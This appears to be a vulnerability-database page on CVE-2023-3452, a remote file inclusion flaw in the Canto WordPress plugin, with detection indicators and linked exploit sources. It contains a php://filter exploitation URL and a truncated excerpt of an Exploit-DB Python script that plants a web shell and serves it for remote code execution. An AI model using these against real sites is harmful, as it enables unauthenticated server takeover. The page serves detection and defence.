CVE-2023-3452
published 2023-08-12CVE-2023-3452: The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows…
PriorityP272critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
5.62%
92.0th percentile
The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canto | canto | <= 3.0.4 | — |
| flightbycanto | canto | <= 3.0.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html↗
- →Detect exploitation attempts by monitoring GET requests to the vulnerable endpoint with a 'wp_abspath' parameter containing a remote URL or PHP stream wrapper (e.g., php://). ↗
- →Flag HTTP requests to /wp-content/plugins/canto/includes/lib/download.php with a 'wp_abspath' query parameter as a strong indicator of CVE-2023-3452 exploitation. ↗
- →Nuclei detection: check response body for both base64 strings 'PD9waHAK' and 'V29yZFByZXNz' with HTTP 200 to confirm successful LFI/RFI exploitation. ↗
- →Unauthenticated attackers exploit the 'wp_abspath' parameter; no authentication headers or cookies are required, so any unauthenticated request to the download.php endpoint with this parameter should be alerted. ↗
- →Monitor for outbound HTTP connections from the web server process (e.g., php-fpm, apache) to attacker-controlled hosts, which would indicate successful RFI via allow_url_include. ↗
- →Detect version fingerprinting attempts against the Canto plugin by monitoring GET requests to /wp-content/plugins/canto/readme.txt, which precedes exploitation in the Nuclei template. ↗
- ·Remote File Inclusion (RFI) exploitation requires the PHP 'allow_url_include' directive to be enabled on the target server. If this is disabled, only Local File Inclusion (LFI) is possible. ↗
- ·Local File Inclusion is less impactful as it requires the attacker to first upload a malicious PHP file via FTP or another method into a web-readable directory. ↗
- ·The vulnerability affects Canto plugin versions up to and including 3.0.4; version detection via readme.txt is used by the Nuclei template to gate exploitation checks. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
exploitdb·2024-02-27·CVSS 9.8
[CRITICAL] Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)
Wordpress Plugin Canto "
def create_admin_file(local_dir, local_shell=None):
if not os.path.exists(local_dir):
os.makedirs(local_dir)
# If a local shell is provided, use it; otherwise, use the default web shell
if local_shell:
with open(f"{local_dir}/admin.php", "wb") as admin_file:
with open(local_shell, "rb") as original_file:
admin_file.write(original_file.read())
else:
with open(f"{local_dir}/admin.php", "w") as admin_file:
admin_file.write(default_web_shell)
def start_local_server(local_port):
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler)
print(f"Local web server on port {local_port}...")
httpd.serve_forever()
return httpd
def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port):
local_dir = "wp
Nuclei
WordPress Canto Plugin <= 3.0.4 - File Inclusion
nuclei·CVSS 9.8
CVE-2023-3452 [CRITICAL] WordPress Canto Plugin <= 3.0.4 - File Inclusion
WordPress Canto Plugin <= 3.0.4 - File Inclusion
Canto plugin for WordPress up to version 3.0.4 contains a remote file inclusion caused by the 'wp_abspath' parameter, letting unauthenticated attackers include and execute arbitrary remote code if allow_url_include is enabled, exploit requires allow_url_include to be enabled.
Template:
id: CVE-2023-3452
info:
name: WordPress Canto Plugin <= 3.0.4 - File Inclusion
author: omarkurt
severity: critical
description: |
Canto plugin for WordPress up to version 3.0.4 contains a remote file inclusion caused by the 'wp_abspath' parameter, letting unauthenticated attackers include and execute arbitrary remote code if allow_url_include is enabled, exploit requires allow_url_include to be enabled.
impact: |
Attackers can execute arbitrary remote code
No writeups or analysis indexed.
https://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/tree.php?rev=2841358#L5https://plugins.trac.wordpress.org/changeset/2951888/canto/trunk/includes/lib/tree.phphttps://www.wordfence.com/threat-intel/vulnerabilities/id/a76077c6-700a-4d21-a930-b0d6455d959c?source=cvehttps://plugins.trac.wordpress.org/browser/canto/trunk/includes/lib/tree.php?rev=2841358#L5https://plugins.trac.wordpress.org/changeset/2951888/canto/trunk/includes/lib/tree.phphttps://www.wordfence.com/threat-intel/vulnerabilities/id/a76077c6-700a-4d21-a930-b0d6455d959c?source=cve
2023-08-12
Published